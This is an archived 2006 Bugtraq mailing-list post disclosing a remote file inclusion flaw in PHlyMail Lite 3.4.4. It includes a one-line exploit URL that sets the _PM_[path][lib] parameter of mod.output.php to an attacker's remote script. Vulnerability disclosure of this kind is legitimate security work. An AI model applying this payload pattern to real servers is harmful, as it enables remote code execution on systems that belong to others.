PHlyMail Lite [PM_[path][lib]=] Remote File Include Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHlyMail Lite [PM_[path][lib]=] Remote File Include Vulnerability
From: D3nGeR@xxxxxxxxx
Date: 18 Aug 2006 21:52:51 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

**********************************************************************************
*PHlyMail Lite [PM_[path][lib]=] Remote File Include Vulnerability
*
*------------------------------------------------------------------------------------------------------
*     - [Script name: PHlyMail Lite v. 3.4.4 ]
*     - [Script site: http://phlymail.de ]
*------------------------------------------------------------------------------------------------------
*       F0und by : D3nGeR
*       e-mail : D3nGeR@xxxxxxxxx
*
*------------------------------------------------------------------------------------------------------
* Exploit:
*
* 
http://www.site.com/[phlymail_path]/handlers/email/mod.output.php?_PM_[path][lib]=[evil
 scripit]
*
*------------------------------------------------------------------------------------------------------
*
*greetz to all my friend :
*
*Team-Evil & Aria-Security Team & D.O.M Team & H@rD Luck Team & IHST TeaM 
*
***********************************************************************************

Follow-Ups:
- Re: PHlyMail Lite [PM_[path][lib]=] Remote File Include Vulnerability
  - From: Carsten Eilers

Prev by Date: Tons of SQL-injections and XSS in Eichhorn Portal and vendor page
Next by Date: Re: mambo-phphop Product Scroller Module R.F.I
Previous by thread: Tons of SQL-injections and XSS in Eichhorn Portal and vendor page
Next by thread: Re: PHlyMail Lite [PM_[path][lib]=] Remote File Include Vulnerability
Index(es):
- Date
- Thread